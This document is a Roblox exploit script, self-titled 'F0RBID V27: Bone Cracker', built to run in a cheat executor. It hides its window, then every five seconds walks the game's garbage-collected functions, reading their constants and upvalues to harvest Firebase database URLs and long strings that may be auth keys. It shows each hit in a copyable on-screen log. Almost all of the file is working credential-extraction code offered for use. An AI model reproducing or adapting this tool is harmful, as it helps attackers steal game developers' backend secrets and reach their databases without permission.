-- ========================================================== --
-- 🌑 F0RBID V27: THE BONE CRACKER (DEEP CREDENTIAL EXPOSE)
-- ========================================================== --
print("[F0RBID] 🛰️ Bone Cracker Protocol Active. Targeting Credentials...")

local HttpService = game:GetService("HttpService")
local CoreGui = game:GetService("CoreGui")
local processed = {}

-- ========================================== --
-- 1. F0RBID EXPOSE UI
-- ========================================== --
local uiParent = (gethui and gethui()) or CoreGui
local hiddenName = "F0RBID_CRACKER_" .. tostring(math.random(10000, 99999))
if uiParent:FindFirstChild(hiddenName) then uiParent[hiddenName]:Destroy() end

local ScreenGui = Instance.new("ScreenGui")
ScreenGui.Name = hiddenName
ScreenGui.Parent = uiParent

local Main = Instance.new("Frame")
Main.Size = UDim2.new(0, 550, 0, 450)
Main.Position = UDim2.new(0.5, -275, 0.5, -225)
Main.BackgroundColor3 = Color3.fromRGB(5, 5, 5)
Main.BorderSizePixel = 0
Main.Active = true
Main.Draggable = true
Main.Parent = ScreenGui

local Title = Instance.new("TextLabel")
Title.Size = UDim2.new(1, -20, 0, 45)
Title.Position = UDim2.new(0, 15, 0, 0)
Title.BackgroundTransparency = 1
Title.Text = "F0RBID <font color='#FF0000'>[BONE CRACKER V27]</font>"
Title.RichText = true
Title.TextColor3 = Color3.fromRGB(255, 255, 255)
Title.Font = Enum.Font.GothamBold
Title.TextSize = 18
Title.TextXAlignment = Enum.TextXAlignment.Left
Title.Parent = Main

local Status = Instance.new("TextLabel")
Status.Size = UDim2.new(1, -30, 0, 20)
Status.Position = UDim2.new(0, 15, 0, 35)
Status.BackgroundTransparency = 1
Status.Text = "● IDENTITY: [F0RBID_ROOT_ACCESS]"
Status.TextColor3 = Color3.fromRGB(150, 0, 0)
Status.Font = Enum.Font.Code
Status.TextSize = 11
Status.TextXAlignment = Enum.TextXAlignment.Left
Status.Parent = Main

local Scroll = Instance.new("ScrollingFrame")
Scroll.Size = UDim2.new(1, -20, 1, -110)
Scroll.Position = UDim2.new(0, 10, 0, 75)
Scroll.BackgroundTransparency = 1
Scroll.ScrollBarThickness = 2
Scroll.ScrollBarImageColor3 = Color3.fromRGB(255, 0, 0)
Scroll.Parent = Main

local UIList = Instance.new("UIListLayout")
UIList.SortOrder = Enum.SortOrder.LayoutOrder
UIList.Padding = UDim.new(0, 4)
UIList.Parent = Scroll

local function AddLog(type, val)
    if processed[val] then return end
    processed[val] = true
    
    local txt = Instance.new("TextBox") -- TextBox so you can copy the text
    txt.Size = UDim2.new(1, 0, 0, 0)
    txt.BackgroundTransparency = 1
    txt.ClearTextOnFocus = false
    txt.ReadOnly = true
    txt.RichText = true
    txt.Text = string.format("<font color='#FF0000'>[%s]</font> %s", type, tostring(val))
    txt.TextColor3 = Color3.fromRGB(230, 230, 230)
    txt.Font = Enum.Font.Code
    txt.TextSize = 11
    txt.TextWrapped = true
    txt.TextXAlignment = Enum.TextXAlignment.Left
    txt.Parent = Scroll
    
    txt.Size = UDim2.new(1, 0, 0, txt.TextBounds.Y + 5)
    Scroll.CanvasSize = UDim2.new(0, 0, 0, UIList.AbsoluteContentSize.Y)
end

-- ========================================== --
-- 2. HARD-CORE SCANNER (NO KICK)
-- ========================================== --
task.spawn(function()
    while true do
        -- Scan for URL and Keys in every possible memory location
        for _, f in pairs(getgc()) do
            if type(f) == "function" and islclosure(f) then
                -- Check Constants
                for _, c in pairs(getconstants(f)) do
                    if type(c) == "string" then
                        if c:find("firebaseio.com") then
                            AddLog("DATABASE_URL", c)
                        elseif #c > 35 and not c:find("/") then
                            AddLog("POTENTIAL_AUTH", c)
                        end
                    end
                end
                -- Check Upvalues
                for _, uv in pairs(getupvalues(f)) do
                    if type(uv) == "string" then
                        if uv:find("firebaseio.com") then
                            AddLog("DATABASE_URL", uv)
                        elseif #uv > 35 and not uv:find("/") then
                            AddLog("POTENTIAL_AUTH", uv)
                        end
                    end
                end
            end
        end
        task.wait(5) -- Scan every 5 seconds
    end
end)
